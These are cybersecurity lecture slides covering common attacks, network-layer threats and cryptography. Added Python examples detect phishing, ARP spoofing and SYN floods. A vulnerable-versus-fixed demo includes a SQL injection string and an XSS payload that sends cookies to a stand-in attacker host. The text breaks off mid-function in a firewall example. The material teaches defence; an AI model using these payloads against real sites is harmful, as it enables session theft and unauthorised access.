Fundamentals of Cyber Security

The document provides an overview of cybersecurity, defining cyberspace and the importance of protecting systems from cyberattacks such as phishing, ransomware, and DDoS attacks. It emphasizes the need for strong passwords and outlines various security measures, including access control and cryptography. Additionally, it discusses the significance of network security and the various types of attacks that can occur at different layers of a network.

Fundamentals of Cyber Security
1

LECTURER:
MR. ILRSHAAD GOOLAMALLY
IT PERSONALITY OF THE YEAR 2014
DIRECTOR
KEEP MOVING CO LTD
What is Cyberspace?
2
The Cyberspace
3

Cyberspace refers to the virtual computer world and, more specifically, to the electronic medium used to form a global computer network that facilitates online communication. It is a large computer network made up of many worldwide computer networks that employ the TCP/IP protocol suite for communication and data exchange.

Cyberspace's core feature is an interactive, virtual environment open to a broad range of participants.
Cyber Security
4

Cybersecurity is the practice of protecting systems, networks, and programs from digital attacks.

These cyberattacks are usually aimed at accessing, changing, or destroying sensitive information; extorting money from users; or interrupting normal business processes.
Importance of Cyber Security
5

In today's connected world, everyone benefits from advanced cyberdefense programs. At an individual level, a cybersecurity attack can result in anything from identity theft, to extortion attempts, to the loss of important data such as family photos.
Everyone relies on critical infrastructure such as power plants, hospitals, and financial service companies. Securing these and other organizations is essential to keeping our society functioning.
Most common Cyber attacks
6

Phishing
Malware
Ransomware
Password attack
Social engineering
DDoS
Phishing
7

Phishing is the practice of sending fraudulent communications that appear to come from a reputable source, usually through email. The goal is to steal sensitive data such as credit card and login information, or to install malware on the victim's machine. Phishing is an increasingly common cyberthreat.
Working principle of Phishing attack
8
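The signs in the phishing description (a sender that merely looks reputable, a link that leads somewhere else, pressure to act now) can be checked mechanically before a user ever clicks. The block below is an added example and not part of the lecture slides: it parses a constructed sample message with Python's standard email module and reports the classic tells against a hypothetical list of trusted sender domains. The message, the domain list and the urgency word list are all assumptions.

```python
"""Added example (not from the slides): triage a message for common phishing indicators."""
import difflib
import re
from email import message_from_string
from email.utils import parseaddr

# Hypothetical list of domains the organisation legitimately receives mail from.
TRUSTED_DOMAINS = ["examplebank.com", "example.com"]

# Constructed sample message, not a real capture.
SAMPLE_MESSAGE = """\
From: ExampleBank Security <alerts@examp1ebank.com>
Reply-To: recover@mail-verify-login.net
To: customer@example.com
Subject: Urgent: verify your account within 24 hours

Your account will be suspended. Log in here: http://examp1ebank.com.login-verify.net/
"""

URGENCY_WORDS = ("urgent", "verify", "suspend", "immediately", "action required")


def domain_of(address):
    """Return the lowercase domain part of an e-mail address ('' if none)."""
    return address.rsplit("@", 1)[-1].lower() if "@" in address else ""


def lookalike_of(domain, trusted, cutoff=0.85):
    """Return the trusted domain that `domain` closely resembles, or None.

    Typosquats such as examp1ebank.com differ from the real name by one or two
    characters, so a high similarity ratio to a trusted domain is suspicious.
    """
    if domain in trusted:
        return None
    matches = difflib.get_close_matches(domain, trusted, n=1, cutoff=cutoff)
    return matches[0] if matches else None


def host_is_trusted(host, trusted):
    return any(host == d or host.endswith("." + d) for d in trusted)


def phishing_indicators(raw_message, trusted=TRUSTED_DOMAINS):
    """Return a list of human-readable findings; an empty list means nothing suspicious."""
    msg = message_from_string(raw_message)
    findings = []

    _, from_addr = parseaddr(msg.get("From", ""))
    from_domain = domain_of(from_addr)
    look = lookalike_of(from_domain, trusted)
    if look:
        findings.append(f"sender domain {from_domain!r} resembles trusted {look!r}")

    _, reply_addr = parseaddr(msg.get("Reply-To", ""))
    if reply_addr and domain_of(reply_addr) != from_domain:
        findings.append(f"Reply-To domain {domain_of(reply_addr)!r} differs from From domain")

    if any(w in msg.get("Subject", "").lower() for w in URGENCY_WORDS):
        findings.append("urgency language in subject")

    for url in re.findall(r"https?://\S+", msg.get_payload()):
        host = url.split("/")[2].lower()
        if not host_is_trusted(host, trusted):
            findings.append(f"link to untrusted host {host!r}")
    return findings


if __name__ == "__main__":
    for finding in phishing_indicators(SAMPLE_MESSAGE):
        print("-", finding)
```

A real mail gateway would combine heuristics like these with SPF/DKIM/DMARC results and URL reputation. The point of the example is that a display name of "ExampleBank Security" says nothing about who sent the message; only the domain after the @ does, and even that has to be compared against what is genuinely expected rather than judged by eye.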
Ransomware
9

Ransomware is a type of malicious software designed to extort money by blocking access to files or to the computer system until a ransom is paid. Paying the ransom does not guarantee that the files will be recovered or the system restored; tested, offline backups are the reliable way back.
Working principle of Ransomware
10
Malware
11

Malware is a term used to describe malicious software, including spyware, ransomware, viruses, and worms. Malware typically gets in when a user clicks a dangerous link or opens an email attachment that then installs the unwanted software. Once inside the system, malware can:
 Block access to key components of the network (ransomware)
 Install additional malware or other harmful software
 Covertly obtain information by transmitting data from the hard drive (spyware)
 Disrupt certain components and render the system inoperable
Working principle Malware
12
Password Attack
13

Obtaining passwords is a common and effective attack approach. A person's password can be obtained by looking around their desk, "sniffing" the network connection to capture passwords sent unencrypted, using social engineering, gaining access to a password database, or outright guessing.
How do Password Attacks work
14

Brute force attack: the attacker tries every possible combination of characters until one matches. The guessing is automated to try as many combinations as possible in as short a time as possible, and commodity GPU crackers now test billions of candidates per second against fast hashes, so short passwords fall quickly.
Dictionary attack: exactly what it sounds like; the attacker tries a prearranged list of likely words and phrases (as found in a dictionary, or in leaked password lists) rather than every combination of symbols, numbers, and letters. Common variations (capitalisation, appended digits or symbols) are usually tried as well.
Tips for creating a strong password
15

 Make your password long; length is the single biggest factor.
 Make your password a nonsense phrase rather than a dictionary word.
 Include numbers, symbols, and uppercase and lowercase letters.
 Avoid using obvious personal information.
 Do not reuse passwords; a password manager makes unique ones practical.
 Change your passwords when there is any sign of compromise (current guidance such as NIST SP 800-63B no longer recommends changing them on a fixed schedule).
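The following is an added example, not material from the slides, that puts the two attacks just described and the tips above side by side: it stores a password the way a well-built system should (salted, with a deliberately slow PBKDF2 hash), runs a dictionary attack with the mangling rules attackers commonly apply, and works out how long exhaustive brute force would take for different lengths and alphabets. The word list, the PBKDF2 iteration count and the guessing rate of 10^10 per second are assumptions.

```python
"""Added example (not from the slides): dictionary and brute-force attacks against stored password hashes."""
import hashlib
import hmac
import os

ITERATIONS = 50_000    # assumed PBKDF2 work factor; real deployments tune this higher
SECONDS_PER_YEAR = 365 * 24 * 3600

# Constructed word list; real attackers use leaked-password lists with millions of entries.
WORDLIST = ["password", "welcome", "letmein", "summer", "dragon", "qwerty"]
SUFFIXES = ["", "1", "123", "!", "2018"]


def hash_password(password, salt=None):
    """Store a salted, slow hash so a stolen database cannot be cracked quickly."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest


def verify_password(password, salt, digest):
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(candidate, digest)   # constant-time comparison


def dictionary_attack(salt, digest, wordlist=WORDLIST):
    """Try each word with common mangling rules (capitalisation, appended suffix)."""
    for word in wordlist:
        for base in (word, word.capitalize(), word.upper()):
            for suffix in SUFFIXES:
                guess = base + suffix
                if verify_password(guess, salt, digest):
                    return guess
    return None


def brute_force_keyspace(length, alphabet_size):
    """Number of candidates an exhaustive search must cover in the worst case."""
    return alphabet_size ** length


def years_to_exhaust(length, alphabet_size, guesses_per_second):
    return brute_force_keyspace(length, alphabet_size) / guesses_per_second / SECONDS_PER_YEAR


if __name__ == "__main__":
    salt, digest = hash_password("Summer123")
    print("dictionary attack recovers:", dictionary_attack(salt, digest))
    salt, digest = hash_password("correct horse battery staple")
    print("dictionary attack on a passphrase:", dictionary_attack(salt, digest))
    rate = 1e10   # assumed: a GPU rig against a fast, unsalted hash
    print("8 lowercase letters: %.1e years" % years_to_exhaust(8, 26, rate))
    print("16 printable chars: %.1e years" % years_to_exhaust(16, 95, rate))
```

The dictionary attack recovers "Summer123" after a few dozen guesses because it is a word plus a common suffix, while the four-word passphrase never appears in the list. The keyspace figures show that eight lowercase letters last seconds against a fast hash, whereas sixteen characters drawn from the full printable set are out of reach by many orders of magnitude. The slow hash multiplies the attacker's cost per guess, which is the defender's lever when the password itself is weak.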
Activity 3: How to create a strong
password
16
DDoS: distributed denial-of-service
17

A distributed denial-of-service (DDoS) attack is a malicious attempt to disrupt the normal traffic of a targeted server, service or network by overwhelming the target or its surrounding infrastructure with a flood of Internet traffic. DDoS attacks achieve effectiveness by utilizing multiple compromised computer systems as sources of attack traffic. Exploited machines can include computers and other networked resources such as IoT devices.
DDoS
18

From a high level, a DDoS attack is like a traffic jam clogging up a highway, preventing regular traffic from arriving at its desired destination.
Scenario: A hospital website being attacked by DDoS
19
Social engineering
20

Social engineering is a tactic that adversaries use to trick you into revealing sensitive information. They can solicit a monetary payment or gain access to your confidential data. Social engineering can be combined with any of the threats listed above to make you more likely to click on links, download malware, or trust a malicious source.
Scenario: Social Engineering Attack
21
The Saudi Crown prince controversy
22

 In 2018 the smartphone of Amazon CEO Jeff Bezos was hacked through a malicious message sent from the WhatsApp account of Saudi Crown Prince Mohammed bin Salman.
 A forensic analysis of the phone found it "highly probable" that the intrusion was triggered by an infected video file sent from the account of the Saudi heir to Bezos, the owner of the Washington Post.
 Large amounts of data were exfiltrated from Bezos's phone within hours.
Physical security risks/threats
23

 A physical threat is a potential cause of an incident that may result in loss of, or physical damage to, computer systems.
 Internal: fire, unstable power supply, humidity in the rooms housing the hardware, etc.
 External: lightning, floods, earthquakes, etc.
 Human: theft, vandalism of the infrastructure and/or hardware, disruption, accidental or intentional errors.
Cyber Security statistics
24

 43% of cyber attacks target small businesses
 In 2018 hackers stole half a billion personal records
 Over 75% of the healthcare industry was infected with malware over the last year
 Large-scale DDoS attacks increased in size by 500%
 Approximately $6 trillion is expected to be spent globally on cybersecurity by 2021
 95% of cybersecurity breaches are due to human error
Cyber Security statistics
25

 More than 77% of organizations do not have a Cyber Security Incident Response plan
 62% of businesses experienced phishing and social engineering attacks in 2018
 52% of breaches featured hacking, 28% involved malware and 32–33% included phishing or social engineering, respectively
 China is responsible for the highest share of coordinated attacks, accounting for 21%, followed by the United States (11%), Brazil (7%), and the Russian Federation (6%)
Part-II
26

NETWORK SECURITY FUNDAMENTALS
Why Security?
27

Security threats are real…
• And need protection against
• Fundamental aspects of information must be protected
 We can't keep ourselves isolated from the Internet
Types of Security
28

Computer Security
 generic name for the collection of tools designed to protect data and to thwart hackers
Network Security
 measures to protect data during their transmission
Internet Security
 measures to protect data during their transmission over a collection of interconnected networks
Goals of Security
29

Confidentiality: prevents unauthorized use or disclosure of information
Integrity: safeguards the accuracy and completeness of information
Availability: authorized users have reliable and timely access to information
Basic ISP Infrastructure
30
Access Control
31

Access control - the ability to permit or deny the use of an object by a subject.
It provides 3 essential services:
 Identification and authentication (who can log in)
 Authorization (what authenticated users are allowed to do)
 Accountability (records what a user actually did)
AAA
32

Authentication
Authorization
Accountability
Authentication
33

Validating a claimed identity of an end user or a device such as a host, server, switch, router, etc.
We must be careful to understand whether a technology is using user, device or application authentication.
Authorization
34

The act of granting access rights to a user, group of users, system, or program.
 Typically this is done in conjunction with, and after, authentication.
Identifying the attack sources
35

Active vs. passive
 Active = writing data to the network. It is common to disguise one's address (spoofing) and so conceal the identity of the traffic sender.
 Passive = reading data on the network
 Purpose = breach of confidentiality
On-path (man-in-the-middle) positions:
 Attackers gain control of a host in the communication path between two victim machines
 Attackers compromise the routing infrastructure to arrange for the traffic to pass through a compromised machine
What are network security aims?
36

Controlling data / network access
Preventing intrusions
Responding to incidents
Ensuring network availability
Protecting information in transit
Network security services
37

Authentication
Authorisation
Access control
Data integrity
Data confidentiality
Auditing / logging
DoS mitigation
TCP/IP Layers
38
Attacks on Different Layers
39
Layer 2 Attacks
40

ARP Spoofing
MAC attacks
DHCP attacks
VLAN hopping
ARP Spoofing
41

ARP spoofing is a type of attack in which a malicious actor sends falsified ARP (Address Resolution Protocol) messages over a local area network.
 This results in the linking of the attacker's MAC address with the IP address of a legitimate computer or server on the network, so traffic meant for that host (typically the default gateway) is delivered to the attacker, who can read, modify or drop it before forwarding it on.
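Added example, not from the slides: an ARP spoofing detector run over a constructed list of ARP replies. The replies, the static gateway entry and the severity scheme are assumptions; the logic is the one tools such as arpwatch apply, namely watching for an IP whose MAC changes and for a MAC that starts answering for several IPs.

```python
"""Added example (not from the slides): detect ARP spoofing from observed ARP replies."""
from collections import defaultdict

# Constructed ARP replies as (timestamp, sender_ip, sender_mac); not a real capture.
ARP_REPLIES = [
    (1, "192.168.1.1",  "aa:bb:cc:00:00:01"),   # the real default gateway
    (2, "192.168.1.10", "aa:bb:cc:00:00:10"),   # a workstation
    (3, "192.168.1.1",  "aa:bb:cc:00:00:01"),
    (4, "192.168.1.1",  "de:ad:be:ef:00:99"),   # attacker claims the gateway's IP
    (5, "192.168.1.10", "de:ad:be:ef:00:99"),   # ... and the workstation's, for a full MITM
]

# Hypothetical static table for hosts that must never change MAC.
STATIC_TABLE = {"192.168.1.1": "aa:bb:cc:00:00:01"}


def detect_arp_spoofing(replies, static_table=None):
    """Return (timestamp, severity, message) alerts.

    HIGH:   an IP in the static table is claimed by a different MAC
    MEDIUM: an IP's MAC changes from what was first observed
    LOW:    one MAC claims several IPs (normal for routers, suspicious on a flat LAN)
    """
    static_table = {ip: mac.lower() for ip, mac in (static_table or {}).items()}
    first_seen = {}                 # ip -> MAC first observed for it
    ips_by_mac = defaultdict(set)
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        if ip in static_table and static_table[ip] != mac:
            alerts.append((ts, "HIGH", f"{ip} claimed by {mac}; static entry is {static_table[ip]}"))
        elif ip in first_seen and first_seen[ip] != mac:
            alerts.append((ts, "MEDIUM", f"{ip} moved from {first_seen[ip]} to {mac}"))
        first_seen.setdefault(ip, mac)
        ips_by_mac[mac].add(ip)
    for mac, ips in sorted(ips_by_mac.items()):
        if len(ips) > 1:
            alerts.append((None, "LOW", f"{mac} claims several IPs: {sorted(ips)}"))
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoofing(ARP_REPLIES, STATIC_TABLE):
        print(alert)
```

On a Linux host, `ip neigh` (or `arp -a`) shows the current cache for a manual check. On the switch side, Dynamic ARP Inspection, which validates ARP replies against the DHCP snooping binding table, drops the spoofed replies before they reach hosts, which is the fix rather than detection after the fact.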
MAC Flooding
42

Exploits a limitation of all switches: the fixed CAM table size.
 CAM = Content Addressable Memory = stores the mapping of individual MAC addresses to physical ports on the switch.
 The attacker floods the switch with frames carrying random source MACs until the table is full; the switch then falls back to flooding unknown-destination frames out of every port, like a hub, and the attacker can sniff traffic meant for other hosts. Port security (limiting MACs per port) is the usual countermeasure.
VLAN Hopping
43

Attack on a network with multiple VLANs
Two primary methods:
 Switch spoofing - the attacker negotiates a trunk link with the switch (for example by speaking DTP) and then has access to every VLAN carried on that trunk.
 Double tagging - the frame is tagged twice; the first switch strips the outer (native VLAN) tag and forwards the frame with the inner tag into a VLAN the attacker is not a member of.
DHCP Attacks
44

DHCP Starvation Attack
 Broadcasting a vast number of DHCP requests with spoofed MAC addresses simultaneously.
 DoS attack that exhausts the pool of DHCP leases.
Rogue DHCP Server Attacks
 An attacker-controlled DHCP server hands out leases naming the attacker as default gateway or DNS server, redirecting client traffic. DHCP snooping on the switch blocks DHCP replies from untrusted ports.

Layer 3 Attacks
45

ICMP Ping Flood
ICMP Smurf
Ping of death
Ping Flooding
46

 A ping flood is a simple denial-of-service attack in which the attacker overwhelms the victim with ICMP "echo request" (ping) packets.
 Ping works by sending an Internet Control Message Protocol (ICMP) Echo Request to a specified interface on the network and waiting for an Echo Reply; the flood forces the victim to spend bandwidth and CPU answering requests that serve no purpose.
TCP Attacks
47

SYN Flood - occurs when an attacker sends SYN requests in rapid succession to a target. It causes the host to retain state for bogus half-open connections until there are no resources left to establish new, legitimate connections.
TCP Attacks
48

Exploits the 3-way handshake (SYN, SYN-ACK, ACK)
The attacker sends a series of SYN packets, often from spoofed source addresses, and never replies with the final ACK
The queue for incomplete connections (the backlog) is finite, so once it fills, new connection requests are dropped
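Added example, not from the slides: the SYN flood described on the two slides above, detected from a connection log. The records are constructed inside the block (two completed handshakes, twenty spoofed sources that send a SYN and nothing more, one harmless stray), and the backlog threshold of ten is an assumption chosen to suit that sample.

```python
"""Added example (not from the slides): spot a SYN flood in a connection log."""
from collections import defaultdict


def legitimate_handshake(ts, src, dst):
    """A client that completes the handshake: SYN followed by the final ACK."""
    return [f"{ts} {src} {dst} S", f"{ts} {src} {dst} A"]


# Constructed records "timestamp src dst flags" (S = SYN from client, A = final ACK).
LOG_LINES = (
    legitimate_handshake(1, "10.0.0.5", "203.0.113.10:443")
    + legitimate_handshake(2, "10.0.0.6", "203.0.113.10:443")
    # twenty spoofed sources each send a SYN and never complete the handshake
    + [f"3 198.51.100.{i} 203.0.113.10:443 S" for i in range(1, 21)]
    + ["4 10.0.0.7 203.0.113.20:80 S"]          # one stray half-open, normal noise
)


def parse_records(lines):
    for line in lines:
        ts, src, dst, flags = line.split()
        yield int(ts), src, dst, flags


def half_open_by_dst(records):
    """Count SYNs per destination that were never followed by the client's ACK."""
    pending = {}                    # (src, dst) -> ts of the unanswered SYN
    for ts, src, dst, flags in records:
        key = (src, dst)
        if flags == "S":
            pending[key] = ts
        elif flags == "A":
            pending.pop(key, None)  # handshake completed, no longer half-open
    counts = defaultdict(int)
    for (_, dst) in pending:
        counts[dst] += 1
    return dict(counts)


def syn_flood_alerts(records, backlog=10):
    """Destinations whose half-open count exceeds the assumed listen backlog."""
    return sorted(dst for dst, n in half_open_by_dst(records).items() if n > backlog)


if __name__ == "__main__":
    print(half_open_by_dst(parse_records(LOG_LINES)))
    print("SYN flood suspected on:", syn_flood_alerts(parse_records(LOG_LINES)))
```

Per-source counting is useless against a real flood because every SYN carries a different spoofed address, which is why the count is kept per destination. On a Linux server, `ss -n state syn-recv` lists the half-open connections, and `net.ipv4.tcp_syncookies=1` lets the kernel accept connections without keeping state until the final ACK arrives.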
Routing Attacks
49

Attempt to poison the routing information
Distance Vector Routing
 Announce 0 distance to all other nodes
 Blackhole traffic
 Eavesdrop
Link State Routing
 Can drop links randomly
 Can claim direct links to any other routers
 A bit harder to attack than DV

BGP attacks
 ASes can announce arbitrary prefixes (prefix hijacking)
 ASes can alter the AS path
Application Layer Attacks
50

Scripting vulnerabilities
Cookie poisoning
Buffer overflow
Hidden field manipulation
Parameter tampering
Cross-site scripting
SQL injection
Server Side Scripting
51

Server-side scripting - the program is executed on the server and not in the user's browser or plugin.
 ASP.NET, PHP, mod_perl, CGI, Ruby, Python
 Benefits:
 Cross-platform
 No plugin required on the user side

 Disadvantages:
 Dynamic scripts create new security concerns: every piece of user input reaches server-side code, and flaws in that code can be exploited
Cross-Site Scripting
52

Cross-site scripting (XSS) - enables attackers to inject scripts into web pages viewed by other users; the script runs in those users' browsers with access to their session.
Persistent (stored) XSS - the payload is saved on the server (e.g. in a comment) and served to every visitor; more devastating
Non-persistent (reflected) XSS - the payload is carried in a link and echoed back in the response; more common
Ex: BeEF (Browser Exploitation Framework) - a tool that uses an XSS hook to control victim browsers
SQL Injection
53

SQL Injection - a subset of the unverified-user-input class of vulnerability, in which malicious input (a fragment of an SQL query) is injected into strings that the application concatenates into its own query. The code is executed when the combined string is passed to the SQL server. The fix is to use parameterised queries, so that input is bound as data rather than parsed as SQL.
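Added example, not from the slides, covering the XSS and SQL injection slides together: a login check written two ways and a comment renderer written two ways, so the vulnerable version and its fix can be run against the same attacker input. The database schema, the user row and the payloads are constructed for the demonstration.

```python
"""Added example (not from the slides): SQL injection and XSS, vulnerable code beside the fix."""
import html
import sqlite3


def make_db():
    """In-memory database with one constructed user row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'S3cret!')")
    return conn


def login_vulnerable(conn, username, password):
    # The input is spliced into the SQL text, so quotes in it change the query's grammar.
    query = (f"SELECT COUNT(*) FROM users WHERE username='{username}' "
             f"AND password='{password}'")
    return conn.execute(query).fetchone()[0] > 0


def login_safe(conn, username, password):
    # Parameter binding: the driver sends the input as data; it can never become SQL.
    query = "SELECT COUNT(*) FROM users WHERE username=? AND password=?"
    return conn.execute(query, (username, password)).fetchone()[0] > 0


def render_comment_vulnerable(comment):
    # Stored XSS: whatever the user typed is emitted as HTML for every later visitor.
    return f"<p class='comment'>{comment}</p>"


def render_comment_safe(comment):
    # Output encoding: < > & " ' become entities, so the browser shows them as text.
    return f"<p class='comment'>{html.escape(comment, quote=True)}</p>"


if __name__ == "__main__":
    db = make_db()
    payload = "x' OR '1'='1"
    print("vulnerable login with injected password:", login_vulnerable(db, "alice", payload))
    print("safe login with the same input:        ", login_safe(db, "alice", payload))
    xss = "<script>document.location='http://attacker.invalid/?c='+document.cookie</script>"
    print(render_comment_vulnerable(xss))
    print(render_comment_safe(xss))
```

In the vulnerable login the password `x' OR '1'='1` closes the quoted string and appends a condition that is always true, so the query counts a row without any valid password; the parameterised version sends the same text as a bound value and the comparison simply fails. The same principle applies to XSS: the fix is to encode output for the context it is inserted into, not to try to strip "bad" characters from input.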
DNS Cache Poisoning
54

Caching an incorrect resource record that did not originate from the authoritative DNS source.
Result: the connection (web, email, network) is redirected to another target controlled by the attacker.
DNS Cache Poisoning
55
Wireless Attacks
56

WEP - the first security mechanism for 802.11 wireless networks
Weaknesses in the protocol's use of RC4 were discovered by Fluhrer, Mantin and Shamir in 2001, whose attacks became known as "FMS attacks"
Tools such as aircrack-ng were developed to automate WEP cracking
The chopchop attack was later released to crack WEP more effectively and faster; WEP should be considered broken and replaced with WPA2 or WPA3
Man in the Middle Attacks (Wireless)
57

Creates a fake access point (an "evil twin") and has clients associate with it instead of the legitimate one.
Captures traffic to see usernames, passwords, etc. that are sent in clear text.
Refer to the video example provided in the lab sessions
Part-III
58

HOW DO WE PROTECT OUR SYSTEM?

Cryptography - what is Cryptography?
59

Part of a field of study known as cryptology
Cryptology includes:
 Cryptography
 Study of methods for secret writing
 Transforming messages into unintelligible form
 Recovering messages using some secret knowledge (key)

 Cryptanalysis
 Analysis of cryptographic systems, inputs and outputs
 To derive confidential information

Cryptography
60

Encryption - process of transforming plaintext to ciphertext using a cryptographic key
Symmetric key cryptography - uses a single key to both encrypt and decrypt information. Also known as secret-key cryptography; the key must be shared in advance over a secure channel.
 Includes DES, 3DES, AES, IDEA, RC5, Blowfish (of these, only AES is recommended for new designs)
Asymmetric key cryptography - separate keys for encryption and decryption (public and private key pairs); the public key can be published, only the private key must be kept secret
 Includes RSA, Diffie-Hellman (key agreement), ElGamal
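Added example, not from the slides: the symmetric/asymmetric split illustrated with textbook RSA, a Diffie-Hellman exchange between two parties, and a toy symmetric cipher keyed with the agreed secret. The primes 61 and 53 are the standard classroom RSA example, the Diffie-Hellman modulus is a 127-bit toy prime chosen only to keep the arithmetic honest, and the XOR stream cipher is an illustration, not a substitute for AES. Nothing here is fit for production use; it shows the mathematics the slide names.

```python
"""Added example (not from the slides): textbook RSA and Diffie-Hellman with toy parameters."""
import hashlib
import secrets


# --- Asymmetric: textbook RSA (no padding; demo only, real use needs OAEP/PSS) ---
def rsa_keygen(p, q, e=65537):
    """Build a key pair from two primes. Returns (public, private) as (n, exponent)."""
    n = p * q
    phi = (p - 1) * (q - 1)
    d = pow(e, -1, phi)          # modular inverse of e, Python 3.8+
    return (n, e), (n, d)


def rsa_encrypt(public_key, m):
    n, e = public_key
    assert 0 <= m < n, "message must be smaller than the modulus"
    return pow(m, e, n)


def rsa_decrypt(private_key, c):
    n, d = private_key
    return pow(c, d, n)


# --- Key agreement: Diffie-Hellman over a toy group, then a derived symmetric key ---
DH_P = 2 ** 127 - 1     # a Mersenne prime; far too small for real use, fine for the maths
DH_G = 2


def dh_keypair(p=DH_P, g=DH_G):
    private = secrets.randbelow(p - 2) + 1
    return private, pow(g, private, p)


def dh_shared_key(their_public, my_private, p=DH_P):
    """Both sides compute g^(ab) mod p and hash it into a 256-bit symmetric key."""
    shared = pow(their_public, my_private, p)
    return hashlib.sha256(shared.to_bytes((p.bit_length() + 7) // 8, "big")).digest()


# --- Symmetric: a toy stream cipher keyed with the DH result (illustration, not AES) ---
def xor_stream(key, data):
    """Keystream block i = SHA-256(key || i); XOR is its own inverse, so this decrypts too."""
    out = bytearray()
    for i in range(0, len(data), 32):
        block = hashlib.sha256(key + (i // 32).to_bytes(8, "big")).digest()
        out += bytes(a ^ b for a, b in zip(data[i:i + 32], block))
    return bytes(out)


if __name__ == "__main__":
    pub, priv = rsa_keygen(61, 53, e=17)          # the classic small textbook example
    c = rsa_encrypt(pub, 65)
    print("RSA:", pub, priv, "65 ->", c, "->", rsa_decrypt(priv, c))

    a, A = dh_keypair()                           # Alice's private/public
    b, B = dh_keypair()                           # Bob's private/public
    k_alice = dh_shared_key(B, a)                 # each side uses the other's public value
    k_bob = dh_shared_key(A, b)
    print("DH keys agree:", k_alice == k_bob)
    ct = xor_stream(k_alice, b"attack at dawn")
    print("decrypts to:", xor_stream(k_bob, ct))
```

Textbook RSA as written is deterministic and unpadded, which is exactly why real systems wrap it in OAEP (encryption) or PSS (signatures). The Diffie-Hellman part shows the practical pattern behind most protocols: the expensive public-key step agrees a secret, and the bulk data is then protected with a fast symmetric key derived from it.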
Terminology of cryptography
61
 Cipher
 Cryptographic technique (algorithm) applying a secret transformation to messages
 Plaintext / cleartext
 Original message or data
 Encryption
 Transforming plaintext, using a secret key, so that its meaning is concealed
 Ciphertext
 Unintelligible encrypted plaintext
 Decryption
 Transforming ciphertext back into the original plaintext
 Cryptographic Key
 Secret knowledge used by a cipher to encrypt or decrypt a message
How does it work?
62
Hash Functions
63

A hash function takes an input message of arbitrary length and outputs a fixed-length code. The fixed-length output is called the hash, or the message digest, of the original input message. A good hash is one-way (the input cannot be recovered from the digest) and collision resistant (finding two different inputs with the same digest should be infeasible).
 Common algorithms: MD5 (128 bits), SHA-1 (160 bits). Both are broken for collision resistance and should not be used for signatures or integrity; use SHA-256 or SHA-3.
Hashing
64

Also called a digest or checksum
A fingerprint that represents the data (on its own a hash is not a signature: anyone can recompute it, so it proves nothing about who produced the data)
Uses:
 Verifying file integrity
 if the hash changes, the data has been corrupted or altered in transit.
 Digital signatures (the document's hash is what actually gets signed)
 Hashing passwords (with a salt and a slow, purpose-built function such as PBKDF2, bcrypt, scrypt or Argon2)
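Added example, not from the slides, for the hash-function and hashing slides: it verifies a constructed file against a published digest, measures how many bits of the digest change when a few bytes of the file change, and then shows why a plain hash is not a signature. An attacker who can swap the file can swap the hash next to it, but cannot produce a valid HMAC without the key. The file contents and the key are assumptions.

```python
"""Added example (not from the slides): integrity checking with a hash versus a keyed MAC."""
import hashlib
import hmac

# Constructed file contents standing in for a downloaded installer or a config file.
ORIGINAL = b"deploy_host=10.0.0.5\nallow_root_login=no\n"
TAMPERED = b"deploy_host=10.0.0.5\nallow_root_login=yes\n"


def digest(data, algorithm="sha256"):
    """Hex digest of `data`; SHA-256 by default (MD5/SHA-1 only for size comparison)."""
    return hashlib.new(algorithm, data).hexdigest()


def verify_integrity(data, expected_hex, algorithm="sha256"):
    """Detects corruption only when `expected_hex` came from a source the attacker cannot touch."""
    return hmac.compare_digest(digest(data, algorithm), expected_hex)


def differing_bits(hex_a, hex_b):
    """Hamming distance between two digests; shows the avalanche effect of a small edit."""
    return bin(int(hex_a, 16) ^ int(hex_b, 16)).count("1")


def mac(key, data):
    """HMAC-SHA256: a hash only holders of `key` can compute, so it also authenticates."""
    return hmac.new(key, data, hashlib.sha256).hexdigest()


def verify_mac(key, data, tag):
    return hmac.compare_digest(mac(key, data), tag)


if __name__ == "__main__":
    published = digest(ORIGINAL)
    print("untampered file verifies:", verify_integrity(ORIGINAL, published))
    print("tampered file verifies:  ", verify_integrity(TAMPERED, published))
    print("bits changed by a 3-byte edit:", differing_bits(published, digest(TAMPERED)), "of 256")
    # An attacker who can replace the file can replace the plain hash beside it too ...
    print("tampered + attacker-recomputed hash:", verify_integrity(TAMPERED, digest(TAMPERED)))
    # ... but cannot forge an HMAC without the key.
    key = b"hypothetical-shared-secret"
    tag = mac(key, ORIGINAL)
    print("tampered + forged HMAC:", verify_mac(key, TAMPERED, mac(b"guessed-key", TAMPERED)))
    for algo in ("md5", "sha1", "sha256"):
        print(algo, len(digest(ORIGINAL, algo)) * 4, "bits")
```

The practical consequence for the "verifying file integrity" use on the slide: a checksum published on the same server as the download only protects against transmission errors. To protect against a substituted file, the digest must come from somewhere the attacker cannot alter, which in practice means a detached signature over it.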
Trusted Network
65

A trusted network is a network of devices that are connected to each other, open only to authorized users, and that allows only secure data to be transmitted.
Standard defensive-oriented technologies
 Firewall
 Intrusion Detection

Build TRUST on top of the TCP/IP infrastructure
 Strong authentication
 Public Key Infrastructure (PKI)
Firewall
66

A firewall is a system designed to prevent unauthorized access to or from a private network.
You can implement a firewall in either hardware or software form, or a combination of both.
Firewalls prevent unauthorized Internet users from accessing private networks connected to the Internet, especially intranets.
Firewall
67

The firewall inspects all traffic crossing it and, according to a rule set, allows "good data" through while blocking "bad data" from entering your network or computer. Rules are evaluated in order, and the safe default is to deny anything no rule explicitly allows.
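Added example, not from the slides: a minimal first-match packet filter that shows the two ideas behind the firewall slides, rule ordering and a default deny. The rule set is a hypothetical policy for a small office; the packet tuples are constructed.

```python
"""Added example (not from the slides): a first-match packet filter with an explicit default deny."""
from ipaddress import ip_address, ip_network

ANY = "any"

# Hypothetical policy for a small office LAN; rules are evaluated top to bottom, first match wins.
RULES = [
    # action   source            destination       proto   port
    ("allow",  ANY,              "192.168.1.0/24", "tcp",  443),   # inbound HTTPS to LAN servers
    ("allow",  ANY,              "192.168.1.0/24", "tcp",  80),    # inbound HTTP
    ("allow",  "192.168.1.0/24", ANY,              ANY,    None),  # anything outbound from the LAN
    ("deny",   ANY,              ANY,              ANY,    None),  # explicit default deny
]


def _addr_matches(rule_net, addr):
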